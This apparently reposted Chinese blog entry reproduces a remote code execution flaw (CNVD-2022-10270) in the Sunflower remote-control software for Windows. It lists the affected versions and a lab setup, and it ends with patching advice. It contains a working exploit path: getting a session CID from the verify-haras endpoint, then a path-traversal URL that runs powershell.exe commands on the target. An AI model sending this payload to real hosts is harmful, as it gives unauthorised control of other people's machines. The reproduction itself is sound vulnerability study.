當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

向日葵RCE复现

發布時間：2023/12/31 编程问答 38 豆豆

生活随笔收集整理的這篇文章主要介紹了向日葵RCE复现小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

漏洞描述

漏洞復現

手動復現

解決方法

漏洞描述

上海貝銳信息科技股份有限公司的向日葵遠控軟件存在遠程代碼執行漏洞（CNVD-2022-10270/CNVD-2022-03672），影響Windows系統使用的個人版和簡約版，攻擊者可利用該漏洞獲取服務器控制權。

影響版本：

向日葵個人版?? for Windows <= 11.0.0.33

向日葵簡約版?? <= V1.0.1.43315（2021.12）

漏洞復現

??? 下載含有漏洞版本的向日葵，win7虛擬機，kali操作機。

手動復現

Win7向日葵開啟。

Kali使用nmap探測或者其他工具探測。

??? 瀏覽器訪問ip+端口號+cgi-bin/rpc?action=verify-haras(獲取session值CID)一個一個端口嘗試。

拿到CID-添加payload和cookie-發送

http://192.168.234.139:49676/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

??? 發送結果。

可以在后面加入其他命令例如打開計算器

執行結果：

解決方法

更新向日葵遠程控制應用。

安裝殺毒軟件，開啟防火墻攔截異常行為。

總結

以上是生活随笔為你收集整理的向日葵RCE复现的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： Go开发工具GoLand使用教程：编写代
下一篇：【数学建模】单、多因素试验的方差分析（M